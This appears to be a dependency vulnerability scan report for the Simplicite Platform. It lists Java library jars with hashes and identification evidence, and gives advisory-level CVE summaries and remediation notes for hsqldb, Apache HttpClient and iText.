Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name hsqldb High Vendor jar package name database Highest Vendor jar package name hsqldb Highest Vendor jar package name java Highest Vendor Manifest build-vendor blaine Medium Vendor Manifest bundle-symbolicname org.hsqldb.hsqldb Medium Vendor Manifest Implementation-Vendor The HSQL Development Group High Vendor Manifest originally-created-by 1.8.0_212-b01 (Oracle Corporation) Low Vendor Manifest specification-vendor The HSQL Development Group Low Vendor pom artifactid hsqldb Highest Vendor pom artifactid hsqldb Low Vendor pom developer email blaine.simpson@admc.com Low Vendor pom developer id unsaved Medium Vendor pom developer name Blaine Simpson Medium Vendor pom groupid org.hsqldb Highest Vendor pom name HyperSQL Database High Vendor pom organization name The HSQL Development Group High Vendor pom organization url http://hsqldb.org Medium Vendor pom url http://hsqldb.org Highest Product file name hsqldb High Product jar package name database Highest Product jar package name hsqldb Highest Product jar package name java Highest Product Manifest Bundle-Name HSQLDB Medium Product Manifest bundle-symbolicname org.hsqldb.hsqldb Medium Product Manifest Implementation-Title Standard runtime High Product Manifest originally-created-by 1.8.0_212-b01 (Oracle Corporation) Low Product Manifest specification-title HSQLDB Medium Product pom artifactid hsqldb Highest Product pom developer email blaine.simpson@admc.com Low Product pom developer id unsaved Low Product pom developer name Blaine Simpson Low Product pom groupid org.hsqldb Highest Product pom name HyperSQL Database High Product pom organization name The HSQL Development Group Low Product pom organization url http://hsqldb.org Low Product pom url http://hsqldb.org Medium Version file version 2.5.0 High Version Manifest Bundle-Version 2.5.0 High Version Manifest Implementation-Version 2.5.0 High Version pom version 2.5.0 Highest
CVE-2022-41853
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default, any static method of any Java class on the classpath may be called, resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to the classes that are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or the Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1, no classes are accessible by default except those in java.lang.Math; others need to be manually enabled. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
httpclient-4.5.10.jar
Description:
Apache HttpComponents Client
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpclient/4.5.10/httpclient-4.5.10.jar
MD5: 367221dde0ef94ea3507928ef40cbe75
SHA1: 7ca2e4276f4ef95e4db725a8cd4a1d1e7585b9e5
SHA256: 38b9f16f504928e4db736a433b9cd10968d9ec8d6f5d0e61a64889a689172134
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpclient High Vendor jar package name apache Highest Vendor jar package name client Highest Vendor jar package name httpclient Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpclient Medium Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.httpcomponents Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid httpclient Highest Vendor pom artifactid httpclient Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpClient High Vendor pom parent-artifactid httpcomponents-client Low Vendor pom url http://hc.apache.org/httpcomponents-client Highest Product file name httpclient High Product jar package name apache Highest Product jar package name client Highest Product jar package name http Highest Product jar package name httpclient Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpclient Medium Product Manifest Implementation-Title Apache HttpClient High Product Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Product Manifest specification-title Apache HttpClient Medium Product pom artifactid httpclient Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpClient High Product pom parent-artifactid httpcomponents-client Medium Product pom url http://hc.apache.org/httpcomponents-client Medium Version file version 4.5.10 High Version Manifest Implementation-Version 4.5.10 High Version pom version 4.5.10 Highest
CVE-2020-13956
Apache HttpClient versions prior to 4.5.13 and 5.0.3 can misinterpret a malformed authority component in request URIs passed to the library as a java.net.URI object and pick the wrong target host for request execution. NVD-CWE-noinfo
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
References:
Vulnerable Software & Versions:
httpcore-4.4.12.jar
Description:
Apache HttpComponents Core (blocking I/O)
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpcore/4.4.12/httpcore-4.4.12.jar
MD5: c152f231bf2570eca354c49ef8756b41
SHA1: 21ebaf6d532bc350ba95bd81938fa5f0e511c132
SHA256: ab765334beabf0ea024484a5e90a7c40e8160b145f22d199e11e27f68d57da08
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpcore High Vendor jar package name apache Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpcore Medium Vendor Manifest implementation-build ${scmBranch}@r${buildNumber}; 2019-09-01 11:24:32+0000 Low Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-core-ga Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor Manifest url http://hc.apache.org/httpcomponents-core-ga Low Vendor pom artifactid httpcore Highest Vendor pom artifactid httpcore Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpCore High Vendor pom parent-artifactid httpcomponents-core Low Vendor pom url http://hc.apache.org/httpcomponents-core-ga Highest Product file name httpcore High Product jar package name apache Highest Product jar package name http Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpcore Medium Product Manifest implementation-build ${scmBranch}@r${buildNumber}; 2019-09-01 11:24:32+0000 Low Product Manifest Implementation-Title HttpComponents Apache HttpCore High Product Manifest implementation-url http://hc.apache.org/httpcomponents-core-ga Low Product Manifest specification-title HttpComponents Apache HttpCore Medium Product Manifest url http://hc.apache.org/httpcomponents-core-ga Low Product pom artifactid httpcore Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpCore High Product pom parent-artifactid httpcomponents-core Medium Product pom url http://hc.apache.org/httpcomponents-core-ga Medium Version file version 4.4.12 High Version Manifest Implementation-Version 4.4.12 High Version pom version 4.4.12 Highest
httpmime-4.5.10.jar
Description:
Apache HttpComponents HttpClient - MIME coded entities
File Path: /var/simplicite/.m2/repository/org/apache/httpcomponents/httpmime/4.5.10/httpmime-4.5.10.jar
MD5: 47abc8053a7cdaaee8a7f5c727955ced
SHA1: 3513ca10d24d7aa962741c90e914fec650f0848c
SHA256: 2bdf3dc862e39e2c69e42f036759e53d457af35a7ce178d8cf286fdb42528864
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpmime High Vendor jar package name apache Highest Vendor jar package name mime Highest Vendor Manifest automatic-module-name org.apache.httpcomponents.httpmime Medium Vendor Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.httpcomponents Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid httpmime Highest Vendor pom artifactid httpmime Low Vendor pom groupid org.apache.httpcomponents Highest Vendor pom name Apache HttpClient Mime High Vendor pom parent-artifactid httpcomponents-client Low Vendor pom url http://hc.apache.org/httpcomponents-client Highest Product file name httpmime High Product jar package name apache Highest Product jar package name http Highest Product jar package name mime Highest Product Manifest automatic-module-name org.apache.httpcomponents.httpmime Medium Product Manifest Implementation-Title Apache HttpClient Mime High Product Manifest implementation-url http://hc.apache.org/httpcomponents-client Low Product Manifest specification-title Apache HttpClient Mime Medium Product pom artifactid httpmime Highest Product pom groupid org.apache.httpcomponents Highest Product pom name Apache HttpClient Mime High Product pom parent-artifactid httpcomponents-client Medium Product pom url http://hc.apache.org/httpcomponents-client Medium Version file version 4.5.10 High Version Manifest Implementation-Version 4.5.10 High Version pom version 4.5.10 Highest
httpservices-4.5.5.jar
File Path: /var/simplicite/.m2/repository/edu/ucar/httpservices/4.5.5/httpservices-4.5.5.jar
MD5: c5207827b8b7e6045b2af7e1e8c5b1d4
SHA1: ee5f217be599e5e03f7f0e55e03f9e721a154f62
SHA256: 8334da7adc9ed7a7b941a780f4d22054f8a11d03973be83ae8399400d55300e4
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name httpservices High Vendor jar package name httpservices Highest Vendor jar package name ucar Highest Vendor Manifest built-on 20150306.1537 Low Vendor Manifest Implementation-Vendor UCAR/Unidata High Vendor Manifest Implementation-Vendor-Id edu.ucar Medium Vendor pom artifactid httpservices Highest Vendor pom artifactid httpservices Low Vendor pom groupid edu.ucar Highest Vendor pom name HttpClient Wrappers High Vendor pom parent-artifactid thredds-parent Low Vendor pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Highest Product file name httpservices High Product jar package name httpservices Highest Product jar package name ucar Highest Product Manifest built-on 20150306.1537 Low Product Manifest Implementation-Title HttpClient Wrappers High Product pom artifactid httpservices Highest Product pom groupid edu.ucar Highest Product pom name HttpClient Wrappers High Product pom parent-artifactid thredds-parent Medium Product pom url http://www.unidata.ucar.edu/software/netcdf-java/documentation.htm Medium Version file version 4.5.5 High Version Manifest Implementation-Version 4.5.5 High Version pom version 4.5.5 Highest
icu4j-64.2.jar
Description:
International Components for Unicode for Java (ICU4J) is a mature, widely used Java library providing Unicode and globalization support.
License:
Unicode/ICU License: https://raw.githubusercontent.com/unicode-org/icu/master/icu4c/LICENSE File Path: /var/simplicite/.m2/repository/com/ibm/icu/icu4j/64.2/icu4j-64.2.jar
MD5: 56a4015e1362c79dee5bd06feabc3116
SHA1: 1d2b0ed49ba380d0c69c0a912a9909c1dbcc3d7c
SHA256: ec5a7d92495a2c0f0a09506aef935cca6a68ce8ac18fbae105381a38288127e3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name icu4j High Vendor file (hint) name icu-project High Vendor file (hint) name unicode High Vendor jar package name ibm Highest Vendor jar package name icu Highest Vendor Manifest automatic-module-name com.ibm.icu Medium Vendor Manifest bundle-copyright © 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html#License Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Vendor Manifest bundle-symbolicname com.ibm.icu Medium Vendor Manifest Implementation-Vendor Unicode, Inc. High Vendor Manifest Implementation-Vendor-Id org.unicode Medium Vendor pom artifactid icu4j Highest Vendor pom artifactid icu4j Low Vendor pom developer id deborah Medium Vendor pom developer id dougfelt Medium Vendor pom developer id JCEmmons Medium Vendor pom developer id macchiati Medium Vendor pom developer id markusicu Medium Vendor pom developer id pedberg Medium Vendor pom developer id srl295 Medium Vendor pom developer id yumaoka Medium Vendor pom developer name Deborah Goldsmith Medium Vendor pom developer name Doug Felt Medium Vendor pom developer name John Emmons Medium Vendor pom developer name Mark Davis Medium Vendor pom developer name Markus Scherer Medium Vendor pom developer name Peter Edberg Medium Vendor pom developer name Steven Loomis Medium Vendor pom developer name Yoshito Umaoka Medium Vendor pom developer org Apple Medium Vendor pom developer org Google Medium Vendor pom developer org IBM Corporation Medium Vendor pom groupid com.ibm.icu Highest Vendor pom name ICU4J High Vendor pom url http://icu-project.org/ Highest Vendor pom (hint) artifactid icu-project Highest Vendor pom (hint) artifactid icu-project Low Vendor pom (hint) artifactid unicode Highest Vendor pom (hint) artifactid unicode Low Vendor pom (hint) name icu-project High Vendor pom (hint) name unicode High Product file name icu4j High Product hint analyzer product 
international_components_for_unicode Highest Product jar package name ibm Highest Product jar package name icu Highest Product Manifest automatic-module-name com.ibm.icu Medium Product Manifest bundle-copyright © 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html#License Low Product Manifest Bundle-Name ICU4J Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.7 Low Product Manifest bundle-symbolicname com.ibm.icu Medium Product Manifest Implementation-Title International Components for Unicode for Java High Product Manifest specification-title International Components for Unicode for Java Medium Product pom artifactid icu4j Highest Product pom developer id deborah Low Product pom developer id dougfelt Low Product pom developer id JCEmmons Low Product pom developer id macchiati Low Product pom developer id markusicu Low Product pom developer id pedberg Low Product pom developer id srl295 Low Product pom developer id yumaoka Low Product pom developer name Deborah Goldsmith Low Product pom developer name Doug Felt Low Product pom developer name John Emmons Low Product pom developer name Mark Davis Low Product pom developer name Markus Scherer Low Product pom developer name Peter Edberg Low Product pom developer name Steven Loomis Low Product pom developer name Yoshito Umaoka Low Product pom developer org Apple Low Product pom developer org Google Low Product pom developer org IBM Corporation Low Product pom groupid com.ibm.icu Highest Product pom name ICU4J High Product pom url http://icu-project.org/ Medium Version file version 64.2 High Version Manifest Bundle-Version 64.2 High Version Manifest Implementation-Version 64.2 High Version pom version 64.2 Highest
pkg:maven/com.ibm.icu/icu4j@64.2 (Confidence: High)
cpe:2.3:a:icu-project:international_components_for_unicode:64.2:*:*:*:*:*:*:* (Confidence: Low)
cpe:2.3:a:unicode:international_components_for_unicode:64.2:*:*:*:*:*:*:* (Confidence: Low)
isoparser-1.1.22.jar
Description:
A generic parser and writer for all ISO 14496 based files (MP4, Quicktime, DCF, PDCF, ...)
License:
Apache Software License - Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/mp4parser/isoparser/1.1.22/isoparser-1.1.22.jar
MD5: b6cb35cf16232e5850de5900f753ed91
SHA1: 70b5c26b52c120d2e94643717a764c4a67640fd6
SHA256: f37f0a997dcc494409b60aeb48cef319348503f84efcd1edcb0fcfb81148fc2d
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name isoparser High Vendor jar package name googlecode Highest Vendor jar package name iso Highest Vendor jar package name mp4 Highest Vendor jar package name mp4parser Highest Vendor jar package name mp4parser Low Vendor pom artifactid isoparser Highest Vendor pom artifactid isoparser Low Vendor pom developer email Sebastian.Annies@googlemail.com Low Vendor pom developer id sannies Medium Vendor pom groupid com.googlecode.mp4parser Highest Vendor pom name ISO Parser High Vendor pom url http://code.google.com/p/mp4parser/ Highest Product file name isoparser High Product jar package name googlecode Highest Product jar package name iso Highest Product jar package name mp4 Highest Product jar package name mp4parser Highest Product pom artifactid isoparser Highest Product pom developer email Sebastian.Annies@googlemail.com Low Product pom developer id sannies Low Product pom groupid com.googlecode.mp4parser Highest Product pom name ISO Parser High Product pom url http://code.google.com/p/mp4parser/ Medium Version file version 1.1.22 High Version pom version 1.1.22 Highest
istack-commons-runtime-3.0.8.jar
Description:
istack common utility code License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/istack/istack-commons-runtime/3.0.8/istack-commons-runtime-3.0.8.jar
MD5: d8555a2f242c55d6727b4d0e82ab8446
SHA1: d6a97364045aa6b99bf2d3c566a3f98599c2d296
SHA256: 4ffabb06be454a05e4398e20c77fa2b6308d4b88dfbef7ca30a76b5b7d5505ef
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name istack-commons-runtime High Vendor jar package name istack Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.istack.commons-runtime Medium Vendor Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.istack Medium Vendor pom artifactid istack-commons-runtime Highest Vendor pom artifactid istack-commons-runtime Low Vendor pom groupid com.sun.istack Highest Vendor pom name istack common utility code runtime High Vendor pom parent-artifactid istack-commons Low Product file name istack-commons-runtime High Product jar package name istack Highest Product jar package name sun Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name istack common utility code runtime Medium Product Manifest bundle-symbolicname com.sun.istack.commons-runtime Medium Product Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Product pom artifactid istack-commons-runtime Highest Product pom groupid com.sun.istack Highest Product pom name istack common utility code runtime High Product pom parent-artifactid istack-commons Medium Version file version 3.0.8 High Version Manifest Bundle-Version 3.0.8 High Version pom version 3.0.8 Highest
istack-commons-tools-3.0.8.jar
Description:
istack common utility code License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/istack/istack-commons-tools/3.0.8/istack-commons-tools-3.0.8.jar
MD5: 920af7b9915c9724948517228e727a11
SHA1: a9bb4e2d83d50623bb2dd26cde8d7dd88e6b7104
SHA256: 3b0e0a85924ebb91303175f2a2183c7f9246fa00342be95205397e73434008ec
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name istack-commons-tools High Vendor jar package name istack Highest Vendor jar package name sun Highest Vendor jar package name tools Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.istack.commons-tools Medium Vendor Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.istack Medium Vendor pom artifactid istack-commons-tools Highest Vendor pom artifactid istack-commons-tools Low Vendor pom groupid com.sun.istack Highest Vendor pom name istack common utility code tools High Vendor pom parent-artifactid istack-commons Low Product file name istack-commons-tools High Product jar package name istack Highest Product jar package name sun Highest Product jar package name tools Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name istack common utility code tools Medium Product Manifest bundle-symbolicname com.sun.istack.commons-tools Medium Product Manifest implementation-build-id 3.0.8-5384038, 2018-12-27T14:45:41+0000 Low Product pom artifactid istack-commons-tools Highest Product pom groupid com.sun.istack Highest Product pom name istack common utility code tools High Product pom parent-artifactid istack-commons Medium Version file version 3.0.8 High Version Manifest Bundle-Version 3.0.8 High Version pom version 3.0.8 Highest
itext-2.1.7.jarDescription:
iText, a free Java-PDF library License:
Mozilla Public License: http://www.mozilla.org/MPL/MPL-1.1.html File Path: /var/simplicite/.m2/repository/com/lowagie/itext/2.1.7/itext-2.1.7.jar
MD5: 7587a618197a065eac4a453d173d4ed6
SHA1: 892bfb3e97074a61123b3b2d7caa2db112750864
SHA256: 7d82c6b097a31cdf5a6d49a327bf582fdec7304da69308f9f6abf54aa9fd9055
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name itext High Vendor jar package name lowagie Highest Vendor jar package name lowagie Low Vendor jar package name pdf Highest Vendor jar package name pdf Low Vendor jar package name text Low Vendor pom artifactid itext Highest Vendor pom artifactid itext Low Vendor pom developer email bruno@lowagie.com Low Vendor pom developer email hallm@users.sourceforge.net Low Vendor pom developer email psoares33@users.sourceforge.net Low Vendor pom developer email xlv@users.sourceforge.net Low Vendor pom developer id blowagie Medium Vendor pom developer id hallm Medium Vendor pom developer id psoares33 Medium Vendor pom developer id xlv Medium Vendor pom developer name Bruno Lowagie Medium Vendor pom developer name Mark Hall Medium Vendor pom developer name Paulo Soares Medium Vendor pom developer name Xavier Le Vourch Medium Vendor pom groupid com.lowagie Highest Vendor pom name iText, a Free Java-PDF library High Vendor pom url http://www.lowagie.com/iText/ Highest Product file name itext High Product jar package name lowagie Highest Product jar package name pdf Highest Product jar package name pdf Low Product jar package name text Low Product pom artifactid itext Highest Product pom developer email bruno@lowagie.com Low Product pom developer email hallm@users.sourceforge.net Low Product pom developer email psoares33@users.sourceforge.net Low Product pom developer email xlv@users.sourceforge.net Low Product pom developer id blowagie Low Product pom developer id hallm Low Product pom developer id psoares33 Low Product pom developer id xlv Low Product pom developer name Bruno Lowagie Low Product pom developer name Mark Hall Low Product pom developer name Paulo Soares Low Product pom developer name Xavier Le Vourch Low Product pom groupid com.lowagie Highest Product pom name iText, a Free Java-PDF library High Product pom url http://www.lowagie.com/iText/ Medium Version file version 2.1.7 High Version pom version 2.1.7 Highest
CVE-2017-9096 (OSSINDEX)
The XML parsers in iText before 5.5.12 and 7.x before 7.0.3 do not disable external entities, which might allow remote attackers to conduct XML external entity (XXE) attacks via a crafted PDF. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.lowagie:itext:2.1.7:*:*:*:*:*:*:*
Remediation is a migration rather than a version bump: the fixed 5.5.12 and 7.0.3 releases are a different artifact (com.itextpdf, AGPL-licensed), and 2.1.7 is the last release of the com.lowagie line. OpenPDF (com.github.librepdf:openpdf) is the maintained fork of this 2.1.7 code base and is the usual drop-in path for code that must stay on the MPL/LGPL API.
itext-rtf-2.1.7.jarDescription:
iText, a free Java-PDF library (rtf package) License:
Mozilla Public License: http://www.mozilla.org/MPL/MPL-1.1.html File Path: /var/simplicite/.m2/repository/com/lowagie/itext-rtf/2.1.7/itext-rtf-2.1.7.jar
MD5: f95d38da50192bc9e3876e3a987f02c1
SHA1: ed1cbe69ff69c6e6fa7645f51c8d25894a177e7b
SHA256: 49d3b9df20ccc6565c91b8b18c638ecb018fd528b6eb64991d6d8ba73975c135
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name itext-rtf High Vendor jar package name lowagie Highest Vendor jar package name lowagie Low Vendor jar package name rtf Highest Vendor jar package name rtf Low Vendor jar package name text Low Vendor pom artifactid itext-rtf Highest Vendor pom artifactid itext-rtf Low Vendor pom developer email bruno@lowagie.com Low Vendor pom developer email hallm@users.sourceforge.net Low Vendor pom developer email psoares33@users.sourceforge.net Low Vendor pom developer email xlv@users.sourceforge.net Low Vendor pom developer id blowagie Medium Vendor pom developer id hallm Medium Vendor pom developer id psoares33 Medium Vendor pom developer id xlv Medium Vendor pom developer name Bruno Lowagie Medium Vendor pom developer name Mark Hall Medium Vendor pom developer name Paulo Soares Medium Vendor pom developer name Xavier Le Vourch Medium Vendor pom groupid com.lowagie Highest Vendor pom name iText, a Free Java-PDF library (rtf package) High Vendor pom url http://www.lowagie.com/iText/ Highest Product file name itext-rtf High Product jar package name lowagie Highest Product jar package name rtf Highest Product jar package name rtf Low Product jar package name text Low Product pom artifactid itext-rtf Highest Product pom developer email bruno@lowagie.com Low Product pom developer email hallm@users.sourceforge.net Low Product pom developer email psoares33@users.sourceforge.net Low Product pom developer email xlv@users.sourceforge.net Low Product pom developer id blowagie Low Product pom developer id hallm Low Product pom developer id psoares33 Low Product pom developer id xlv Low Product pom developer name Bruno Lowagie Low Product pom developer name Mark Hall Low Product pom developer name Paulo Soares Low Product pom developer name Xavier Le Vourch Low Product pom groupid com.lowagie Highest Product pom name iText, a Free Java-PDF library (rtf package) High Product pom url http://www.lowagie.com/iText/ Medium Version file version 2.1.7 High Version pom version 2.1.7 Highest
j2objc-annotations-1.3.jarDescription:
A set of annotations that provide additional information to the J2ObjC
translator to modify the result of translation.
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/j2objc/j2objc-annotations/1.3/j2objc-annotations-1.3.jar
MD5: 5fa4ec4ec0c5aa70af8a7d4922df1931
SHA1: ba035118bc8bac37d7eff77700720999acd9986d
SHA256: 21af30c92267bd6122c0e0b4d20cccb6641a37eaf956c6540ec471d584e64a7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name j2objc-annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name j2objc Highest Vendor jar package name j2objc Low Vendor pom artifactid j2objc-annotations Highest Vendor pom artifactid j2objc-annotations Low Vendor pom groupid com.google.j2objc Highest Vendor pom name J2ObjC Annotations High Vendor pom url google/j2objc/ Highest Product file name j2objc-annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name google Highest Product jar package name j2objc Highest Product jar package name j2objc Low Product pom artifactid j2objc-annotations Highest Product pom groupid com.google.j2objc Highest Product pom name J2ObjC Annotations High Product pom url google/j2objc/ High Version file version 1.3 High Version pom version 1.3 Highest
jackcess-3.0.1.jarDescription:
A pure Java library for reading from and writing to MS Access databases. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/healthmarketscience/jackcess/jackcess/3.0.1/jackcess-3.0.1.jar
MD5: e787e04bfd785b16d366021373309617
SHA1: e753ed760d06a0b6849c02d3d4c603ae6c8e05c8
SHA256: 743bfe830de83f2a64b0ff23337c18f1412c3caf35f98c5f6668f65c109993d7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackcess High Vendor jar package name healthmarketscience Highest Vendor jar package name jackcess Highest Vendor Manifest bundle-docurl https://openhms.sourceforge.io/ Low Vendor Manifest bundle-symbolicname com.healthmarketscience.jackcess Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid jackcess Highest Vendor pom artifactid jackcess Low Vendor pom developer email jahlborn@users.sf.net Low Vendor pom developer email javajedi@users.sf.net Low Vendor pom developer id jahlborn Medium Vendor pom developer id javajedi Medium Vendor pom developer name James Ahlborn Medium Vendor pom developer name Tim McCune Medium Vendor pom developer org Dell Boomi Medium Vendor pom groupid com.healthmarketscience.jackcess Highest Vendor pom name Jackcess High Vendor pom parent-artifactid openhms-parent Low Vendor pom parent-groupid com.healthmarketscience Medium Vendor pom url https://jackcess.sourceforge.io Highest Product file name jackcess High Product jar package name healthmarketscience Highest Product jar package name jackcess Highest Product jar package name version Highest Product Manifest bundle-docurl https://openhms.sourceforge.io/ Low Product Manifest Bundle-Name Jackcess Medium Product Manifest bundle-symbolicname com.healthmarketscience.jackcess Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid jackcess Highest Product pom developer email jahlborn@users.sf.net Low Product pom developer email javajedi@users.sf.net Low Product pom developer id jahlborn Low Product pom developer id javajedi Low Product pom developer name James Ahlborn Low Product pom developer name Tim McCune Low Product pom developer org Dell Boomi Low Product pom groupid com.healthmarketscience.jackcess Highest Product pom name Jackcess High Product pom parent-artifactid openhms-parent Medium Product pom parent-groupid com.healthmarketscience Medium Product pom url https://jackcess.sourceforge.io Medium Version file version 3.0.1 High Version Manifest Bundle-Version 3.0.1 High Version pom parent-version 3.0.1 Low Version pom version 3.0.1 Highest
jackcess-encrypt-3.0.0.jarDescription:
An add-on to the Jackcess library for handling encryption in MS Access files. License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/healthmarketscience/jackcess/jackcess-encrypt/3.0.0/jackcess-encrypt-3.0.0.jar
MD5: 4e12f5c0713e5e1b38b74f8946d17c27
SHA1: 24ee9302d731e7c66e828049bb055ca710e29f03
SHA256: d624d55b3090ab733192041a758727b94a3136031660ab794998f3bd72b4c213
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackcess-encrypt High Vendor jar package name healthmarketscience Highest Vendor jar package name jackcess Highest Vendor Manifest bundle-docurl http://www.healthmarketscience.com Low Vendor Manifest bundle-symbolicname com.healthmarketscience.jackcess.encrypt Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid jackcess-encrypt Highest Vendor pom artifactid jackcess-encrypt Low Vendor pom developer email jahlborn@users.sf.net Low Vendor pom developer id jahlborn Medium Vendor pom developer name James Ahlborn Medium Vendor pom developer org Boomi, Inc. Medium Vendor pom groupid com.healthmarketscience.jackcess Highest Vendor pom name Jackcess Encrypt High Vendor pom parent-artifactid openhms-parent Low Vendor pom parent-groupid com.healthmarketscience Medium Vendor pom url http://jackcessencrypt.sf.net Highest Product file name jackcess-encrypt High Product jar package name healthmarketscience Highest Product jar package name jackcess Highest Product Manifest bundle-docurl http://www.healthmarketscience.com Low Product Manifest Bundle-Name Jackcess Encrypt Medium Product Manifest bundle-symbolicname com.healthmarketscience.jackcess.encrypt Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid jackcess-encrypt Highest Product pom developer email jahlborn@users.sf.net Low Product pom developer id jahlborn Low Product pom developer name James Ahlborn Low Product pom developer org Boomi, Inc. Low Product pom groupid com.healthmarketscience.jackcess Highest Product pom name Jackcess Encrypt High Product pom parent-artifactid openhms-parent Medium Product pom parent-groupid com.healthmarketscience Medium Product pom url http://jackcessencrypt.sf.net Medium Version file version 3.0.0 High Version Manifest Bundle-Version 3.0.0 High Version pom parent-version 3.0.0 Low Version pom version 3.0.0 Highest
jackson-annotations-2.10.5.jarDescription:
Core annotations used for value types, used by Jackson data binding package.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.10.5/jackson-annotations-2.10.5.jar
MD5: 2d98c7a68e9e99d98ea99dd9dc3639a4
SHA1: 33298de8da86f92f8ccd61ced214d3b16f8c531e
SHA256: 5ad94fbb2642df695892c4d6e2ab4c319821e5f9bfb7b920f1378de4f611417c
Referenced In Project/Scope: Simplicite Platform:compile
